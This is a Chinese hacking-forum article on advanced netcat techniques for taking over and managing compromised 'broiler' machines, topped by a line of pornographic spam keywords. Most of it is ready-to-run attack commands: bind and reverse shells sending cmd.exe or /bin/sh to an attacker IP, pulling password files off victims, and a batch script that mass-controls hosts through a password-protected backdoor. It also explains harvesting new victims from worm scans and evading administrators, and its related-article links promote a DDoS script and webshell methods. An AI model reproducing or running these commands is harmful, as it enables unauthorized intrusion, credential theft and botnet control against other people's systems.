欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

nc.exe高級(jí)技巧應(yīng)用匯總

 更新時(shí)間:2007年06月06日 00:00:00   作者:  
nc.exe高級(jí)技巧應(yīng)用匯總

文章作者:zhoutree 

0. 寫在前面的話
1. Netcat 1.10 for NT - nc11nt.zip,原始英文信息
2. Netcat 1.10 for NT 幫助信息
3. Netcat 1.10 常用的命令格式
4. 管理肉雞,更改肉雞設(shè)置
5. 下載連接
6. 后記

######################################################################
0. 寫在前面的話
######################################################################
最近工作比較空閑,老是想著怎么自動(dòng)telnet肉雞,自動(dòng)執(zhí)行命令。來(lái)管理自己的肉雞。
自己寫一個(gè)程序。功底是不夠的,所以只有看了看nc的幫助信息,雖然只看了個(gè)半懂,
但是借助于金山詞霸2002版本, 還是明白了一點(diǎn)東西.
我覺(jué)的有必要再總結(jié)一下.反正主要是滿足我自己的需要.

######################################################################
1. Netcat 1.10 for NT - nc11nt.zip
######################################################################
Basic Features

* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomizer
* Can read command line arguments from standard inputb
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Ability to let another program service established
connections
* Telnet-options responder

New for NT

* Ability to run in the background without a console window
* Ability to restart as a single-threaded server to handle a new
connection
________________________________________________________________________
Some of the features of netcat are: 

Outbound or inbound connections, TCP or UDP, to or from any ports 
Full DNS forward/reverse checking, with appropriate warnings 
Ability to use any local source port 
Ability to use any locally-configured network source address 
Built-in port-scanning capabilities, with randomizer 
Built-in loose source-routing capability 
Can read command line arguments from standard input 
Slow-send mode, one line every N seconds 
Optional ability to let another program service inbound connections 

Some of the potential uses of netcat: 

Script backends 
Scanning ports and inventorying services 
Backup handlers 
File transfers 
Server testing and simulation 
Firewall testing 
Proxy gatewaying 
Network performance testing 
Address spoofing tests 
Protecting X servers 
1001 other uses you`ll likely come up with 

Netcat + Encryption = Cryptcat

對(duì)比win2000微軟的telnet.exe和微軟的tlntsvr.exe服務(wù),連接的時(shí)候就可以看出來(lái)了.
1.1 NC.EXE是一個(gè)非標(biāo)準(zhǔn)的telnet客戶端程序,
1.2 還有一個(gè)putty.exe客戶端程序,提供四種連接模式
-raw -telnet -rlogin -ssh.

######################################################################
2. Netcat 1.10 for NT 幫助信息
######################################################################
C:\WINDOWS\Desktop>nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode (后臺(tái)模式)
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft (本幫助信息)
-i secs delay interval for lines sent, ports scanned (延遲時(shí)間)
-l listen mode, for inbound connects (監(jiān)聽(tīng)模式,等待連接)
-L listen harder, re-listen on socket close (連接關(guān)閉后,仍然繼續(xù)監(jiān)聽(tīng))
-n numeric-only IP addresses, no DNS (ip數(shù)字模式,非dns解析)
-o file hex dump of traffic (十六進(jìn)制模式輸出文件,三段) 
-p port local port number (本地端口)
-r randomize local and remote ports (隨機(jī)本地遠(yuǎn)程端口)
-s addr local source address (本地源地址)
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose] (-vv 更多信息)
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning] (掃描模式,-vv)
port numbers can be individual or ranges: m-n [inclusive]

######################################################################
3. Netcat 1.10 常用的命令格式
######################################################################
下面引用 《沉睡不醒 10月15日凌晨》的文章的部分。

3.1.端口的刺探:
nc -vv ip port
RIVER [192.168.0.198] 19190 (?) open //顯示是否開(kāi)放open
3.2.掃描器
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
這樣掃描會(huì)留下大量的痕跡,系統(tǒng)管理員會(huì)額外小心

3.3. 后門
victim machine: //受害者的機(jī)器
nc -l -p port -e cmd.exe //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻擊者的機(jī)器.
nc ip -p port //連接victim_IP,然后得到一個(gè)shell。


3.4.反向連接
attacker machine: //一般是sql2.exe,遠(yuǎn)程溢出,webdavx3.exe攻擊.
//或者wollf的反向連接.
nc -vv -l -p port 
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port

或者:
attacker machine:
nc -vv -l -p port1 /*用于輸入*/
nc -vv -l -p prot2 /*用于顯示*/
victim machine:
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2

139要加參數(shù)-s(nc.exe -L -p 139 -d -e cmd.exe -s 對(duì)方機(jī)器IP)
這樣就可以保證nc.exe優(yōu)先于NETBIOS。 


3.5.傳送文件:
3.5.1 attacker machine <-- victim machine //從肉雞拖密碼文件回來(lái).
nc -d -l -p port < path\filedest     /*attacker machine*/ 可以shell執(zhí)行
nc -vv attacker_ip port > path\file.txt /*victim machine*/ 需要Ctrl+C退出
//肉雞需要gui界面的cmd.exe里面執(zhí)行(終端登陸,不如安裝FTP方便).否則沒(méi)有辦法輸入Crl+C.

3.5.2 attacker machine --> victim machine //上傳命令文件到肉雞
nc -vv -l -p port > path\file.txt      /*victim machine*/ 需要Ctrl+C退出
nc -d victim_ip port < path\filedest   /*attacker machine*/ 可以shell執(zhí)行
//這樣比較好.我們登陸終端.入侵其他的肉雞.可以選擇shell模式登陸.

結(jié)論: 可以傳輸ascii,bin文件.可以傳輸程序文件.

問(wèn)題:連接某個(gè)ip后,傳送完成后,需要發(fā)送Ctrl+C退出nc.exe .
或者只有再次連接使用pskill.exe 殺掉進(jìn)程.但是是否釋放傳輸文件打開(kāi)的句柄了?


3.6 端口數(shù)據(jù)抓包.
nc -vv -w 2 -o test.txt www.xfocus.net 80 21-15

< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...
< 00000084 83 00 00 01 8f # .....


3.7 telnet,自動(dòng)批處理。 ★★★★★我要重點(diǎn)推薦的東西就是這個(gè).
nc victim_ip port < path\file.cmd   /*victim machine*/ 顯示執(zhí)行過(guò)程.
nc -vv victim_ip port < path\file.cmd   /*victim machine*/ 顯示執(zhí)行過(guò)程.

nc -d victim_ip port < path\file.cmd 安靜模式.

_______________file.cmd________________________
password
cd %windir%
echo []=[%windir%]
c:
cd \
md test
cd /d %windir%\system32\
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
_______________file.cmd__END___________________

######################################################################
4. 管理肉雞,更改肉雞設(shè)置
######################################################################
4.1 比如要統(tǒng)一更改肉雞上面的代理端口.snake.exe 修改為11111 服務(wù)名稱"sksockserver"
使用winshell后門. 端口1234 密碼password
命令格式就是
modi.bat youip.txt

___________modi.bat____________________________
@if "%1"=="" echo Error: no ip.txt &&goto END

:start
@echo password >a.cmd
@echo s >>a.cmd
@echo cd /d %%windir%%\system32\ >>a.cmd
@net stop "sksockserver" >>a.cmd
@snake.exe -config port 11111 >>a.cmd
@net start "sksockserver" >>a.cmd
@exit >>a.cmd

:auto
@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)

:END
___________modi.bat__END_______________________


4.2

@echo off
color f0
:start
cls
C:\nc -vv -w 3 -l -p 80>>80.txt
goto start
把防火墻關(guān)掉以后運(yùn)行這個(gè)批處理,會(huì)監(jiān)聽(tīng)到許多探測(cè)U漏洞的信息,大多
是三條一組--妮姆達(dá)病毒掃描你的。這樣就會(huì)得到肉雞的.雖然質(zhì)量不高.
但是也是一種便宜的辦法.

肉雞特征:
1。unicode漏洞
2。guest密碼為空,administrators組用戶
3。其他漏洞

自己慢慢的爽去吧。不過(guò),再次強(qiáng)調(diào)一句,不建議而且是不能破壞國(guó)內(nèi)主機(jī),上去以后將tftp.exe改名。然后用pskill干掉mmc.exe進(jìn)程,之后是殺毒。做好后門以后,將guest帳號(hào)停用,以對(duì)付傻瓜掃描器

######################################################################
5. 下載連接
######################################################################
5.1 http://www.atstake.com/research/tools/network_utilities/
Tool: Netcat 1.10 for Unix 
Version: 03.20.96 
Platforms: *nix

Tool: Netcat 1.1 for Win 95/98/NT/2000 
Version: 02.08.98 
Platforms: Runs on Win 95/98/NT/2000 


5.2 http://www.xfocus.net/download.php?id=320 
名稱: cryptcat_nt.zip 更新時(shí)間: 2002-04-05 
類別: 網(wǎng)絡(luò)工具 平臺(tái): Win9x/NT/2000 大?。?nbsp;115.8K 提交: maxilaw 
簡(jiǎn)介: 加密傳輸?shù)膎c。 

5.3 http://content.443.ch/pub/security/blackhat/Networking/nc/ 國(guó)外的網(wǎng)站
10.03.02 15:48 1305 cryptcat.txt
10.03.02 15:48 245760 cryptcat_linux2.tar
10.03.02 15:48 118533 cryptcat_nt.zip

相關(guān)文章

  • expression&eval跨站的一個(gè)方法

    expression&eval跨站的一個(gè)方法

    expression&eval跨站的一個(gè)方法...
    2007-03-03
  • 在肉雞上架設(shè)全能服務(wù)器的方法介紹

    在肉雞上架設(shè)全能服務(wù)器的方法介紹

    肉雞上架設(shè)服務(wù)器當(dāng)看見(jiàn)別人有自己網(wǎng)站的時(shí)候,你是不是也很想有一個(gè)自己的WEB站點(diǎn)呢?可是建站需要空間,象偶這樣的窮人都沒(méi)錢買空間,只有自己動(dòng)手,正所謂自己動(dòng)手豐衣足食,別忘了,DIY永遠(yuǎn)是黑客的精神!
    2008-03-03
  • 讓侮辱中國(guó)人的法國(guó)cnn網(wǎng)站完蛋

    讓侮辱中國(guó)人的法國(guó)cnn網(wǎng)站完蛋

    讓侮辱中國(guó)人的法國(guó)cnn網(wǎng)站完蛋?。?!只要你幫助打開(kāi)一個(gè)網(wǎng)頁(yè)?。? 如何DOS攻擊CNN網(wǎng)站? ?將這些文字復(fù)制,并保存成一個(gè)html文件,然后在瀏覽器中打開(kāi),按提示啟用腳本,然后,每隔3秒鐘將自動(dòng)連接一次cnn網(wǎng)站(注意,是自動(dòng)的,只要你不關(guān)閉瀏覽器窗口就可以了,也不會(huì)影響你的其它操作),如果全世界中國(guó)人聯(lián)合起來(lái),那么cnn網(wǎng)站絕對(duì)崩潰
    2008-04-04
  • dvbbs 8.2 SQL Injection注射漏洞分析

    dvbbs 8.2 SQL Injection注射漏洞分析

    利用方式:一個(gè)典型的sql注射漏洞,按照公告里說(shuō)的用
    2008-05-05
  • phpMyAdmin 后臺(tái)拿webshell

    phpMyAdmin 后臺(tái)拿webshell

    phpMyAdmin 后臺(tái)拿webshell...
    2007-03-03
  • sql2005 sa執(zhí)行命令方法總結(jié)

    sql2005 sa執(zhí)行命令方法總結(jié)

    測(cè)試環(huán)境:windows xp pro sp2 + mssql 2005(服務(wù)以system權(quán)限啟動(dòng))
    2008-12-12
  • PHP服務(wù)端SESSION管理工具提供下載

    PHP服務(wù)端SESSION管理工具提供下載

    PHP服務(wù)端SESSION管理工具提供下載...
    2007-10-10
  • QQ密碼找回方法全攻略(QQ被盜怎么要回QQ密碼呢)

    QQ密碼找回方法全攻略(QQ被盜怎么要回QQ密碼呢)

    自從本站開(kāi)辦以來(lái),不斷有網(wǎng)友來(lái)信大量重復(fù)詢問(wèn)同一個(gè)問(wèn)題:QQ密碼的破解。因?yàn)檎鹃L(zhǎng)有限的精力,不可能一一作答,以后同樣的問(wèn)題我將不會(huì)回覆了,您自己看這篇教程吧
    2012-09-09
  • php+mysql注入頁(yè)面實(shí)現(xiàn)

    php+mysql注入頁(yè)面實(shí)現(xiàn)

    最近在弄靶場(chǎng),原本是打算找一些漏洞程序來(lái)做實(shí)驗(yàn)環(huán)境,但是去找這些程序感覺(jué)太麻煩了,幾段代碼能實(shí)現(xiàn)的東西還是自己寫吧
    2012-07-07
  • 利用css實(shí)現(xiàn)掛馬的代碼

    利用css實(shí)現(xiàn)掛馬的代碼

    本站只是提供知識(shí),方便大家以后的查殺木馬,不是用來(lái)搞破壞
    2008-01-01

最新評(píng)論